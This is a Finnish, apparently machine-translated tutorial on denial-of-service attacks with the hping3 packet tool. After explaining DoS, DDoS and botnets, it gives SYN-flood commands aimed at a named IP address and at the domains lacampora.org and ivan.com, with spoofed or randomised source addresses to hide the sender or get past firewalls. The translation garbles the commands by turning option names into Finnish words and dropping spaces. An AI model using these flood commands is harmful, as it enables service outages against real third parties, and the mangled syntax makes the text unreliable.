hping3 tulva ddos

Hping3 Flood Ddos



Tämä opetusohjelma keskittyy DDOS (Distributed Denial of Service) -hyökkäyksiin hping3 -työkalun avulla. Jos olet jo perehtynyt DOS (Denial of Service) - ja DDOS -hyökkäyksiin, voit jatkaa lukemista hping3: n käytännön ohjeista, muuten on suositeltavaa oppia näiden hyökkäysten toiminnasta.

DOS -hyökkäykset


Palvelunestohyökkäys (DOS) on hyvin yksinkertainen tekniikka palvelujen saatavuuden estämiseksi (siksi sitä kutsutaan palvelunestohyökkäykseksi). Tämä hyökkäys koostuu kohteen ylikuormittamisesta ylisuurilla paketeilla tai suurella määrällä niitä.







Vaikka tämä hyökkäys on erittäin helppo toteuttaa, se ei vaaranna kohteen tietoja tai yksityisyyttä, mutta se ei ole tunkeutuva hyökkäys ja sen tarkoituksena on vain estää pääsy kohteeseen.
Lähettämällä tietyn määrän paketteja kohde ei pysty käsittelemään hyökkääjiä estämään palvelinta palvelemasta laillisia käyttäjiä.



DOS -hyökkäykset suoritetaan yhdestä laitteesta, joten ne on helppo pysäyttää estämällä hyökkääjän IP -osoite, mutta hyökkääjä voi muuttaa ja jopa väärentää (kloonata) kohde -IP -osoitteen, mutta palomuurien ei ole vaikea käsitellä tällaisia ​​hyökkäyksiä , toisin kuin mitä tapahtuu DDOS -hyökkäyksille.



DDOS -hyökkäykset

Hajautettu palvelunestohyökkäys (DDOS) on samanlainen kuin DOS -hyökkäys, mutta se suoritetaan eri solmuista (tai eri hyökkääjistä) samanaikaisesti. Yleensä DDOS -hyökkäykset suoritetaan botnet -verkoissa. Botnetit ovat automaattisia komentosarjoja tai ohjelmia, jotka tartuttavat tietokoneita suorittamaan automaattisen tehtävän (tässä tapauksessa DDOS -hyökkäyksen). Hakkeri voi luoda botnetin ja saastuttaa monet tietokoneet, joista botnetit käynnistävät DOS -hyökkäyksiä, ja se, että monet botnetit ampuvat samanaikaisesti, muuttavat DOS -hyökkäyksen DDOS -hyökkäykseksi (siksi sitä kutsutaan hajautetuksi).





Tietenkin on poikkeuksia, joissa todelliset ihmishyökkääjät tekivät DDOS -hyökkäyksiä, esimerkiksi tuhansien ihmisten maailmanlaajuisesti yhdistämä hakkerit -ryhmä Anonymous käytti tätä tekniikkaa hyvin usein sen helpon käyttöönoton vuoksi (se vaati vain vapaaehtoisia, jotka kertoivat syystään), Esimerkiksi Anonyymi jätti Gaddafin Libyan hallituksen kokonaan irti hyökkäyksen aikana, Libyan valtio jäi puolustuskyvyttömäksi tuhansien hyökkääjien edessä ympäri maailmaa.

Tämäntyyppisiä hyökkäyksiä, kun niitä suoritetaan useista eri solmuista, on erittäin vaikea estää ja pysäyttää ja ne vaativat yleensä erikoislaitteistoa, koska palomuurit ja puolustussovellukset eivät ole valmiita käsittelemään tuhansia hyökkääjiä samanaikaisesti. Tämä ei koske hping3: ta, suurin osa tämän työkalun kautta tehdyistä hyökkäyksistä estetään puolustuslaitteilla tai ohjelmistoilla, mutta se on hyödyllinen paikallisverkoissa tai huonosti suojattuja kohteita vastaan.



Tietoja hpingista3

Työkalun hping3 avulla voit lähettää manipuloituja paketteja. Tämän työkalun avulla voit hallita pakettien kokoa, määrää ja pirstoutumista ylikuormittaaksesi kohteen ja ohittaaksesi tai hyökätäksesi palomuureihin. Hping3 voi olla hyödyllinen tietoturva- tai valmiustestaustarkoituksiin, sillä sen avulla voit testata palomuurien tehokkuuden ja pystyäkö palvelin käsittelemään suuren määrän paketteja. Alta löydät ohjeet hping3: n käyttämiseen turvallisuustestaustarkoituksiin.

DDOS -hyökkäysten aloittaminen hping3: lla:

Debian- ja Linux -pohjaisissa jakeluissa voit asentaa hping3: n suorittamalla:

#sopivaAsentaahping3-ja

Yksinkertainen DOS (ei DDOS) hyökkäys olisi:

#sudohping3-S --tulva -V -p 80170,155.9.185

Missä:
sudo: antaa tarvittavat oikeudet hping3: n suorittamiseen.
hping3:
kutsuu hping3 -ohjelmaa.
-S: määrittää SYN -paketit.
-tulva: ampua harkintasi mukaan, vastaukset jätetään huomiotta (siksi vastauksia ei näytetä) ja paketit lähetetään mahdollisimman nopeasti.
-V: Monisanaisuus.
-s 80: portti 80, voit korvata tämän numeron palvelulle, jonka haluat hyökätä.
170.155.9.185: kohde -IP.

Tulva käyttäen SYN -paketteja porttia 80 vastaan:

Seuraava esimerkki kuvaa SYN -hyökkäystä lacampora.orgia vastaan:

#sudohping3 lacampora.org-q -n -d 120 -S -p 80 --tulva -ja lähde

Missä:
Lacampora.org: on tavoite
-q: lyhyt lähtö
-n: näytä kohde -IP isännän sijaan.
-d 120: aseta paketin koko
-ja lähde: piilota IP -osoite.

Seuraava esimerkki esittää toisen mahdollisen tulvan esimerkin:

SYN -tulva porttia 80 vastaan:

#sudohping3-ja lähdeivan.com-S -q -p 80 --tulva

Hping3: n avulla voit myös hyökätä kohteisiisi väärennetyllä IP -osoitteella, jotta voit ohittaa palomuurin, voit jopa kloonata itse kohde -IP: n tai minkä tahansa sallitun osoitteen (voit saavuttaa sen esimerkiksi Nmapin tai haistaa kuunnellaksesi liitännät).

Syntaksi olisi:

#sudohping3-kohteeseen <FAKE IP> <kohde> -S -q -p 80 -nopeammin -c2

Tässä käytännön esimerkissä hyökkäys näyttäisi:

#sudohping3-kohteeseen190.0.175.100 190.0.175.100-S -q -p 80 -nopeammin -c2

Toivottavasti pidit tätä hping3 -opetusohjelmaa hyödyllisenä. Jatka Linuxin seuraamistaVinkkejä ja päivityksiä Linuxista ja verkostoitumisesta.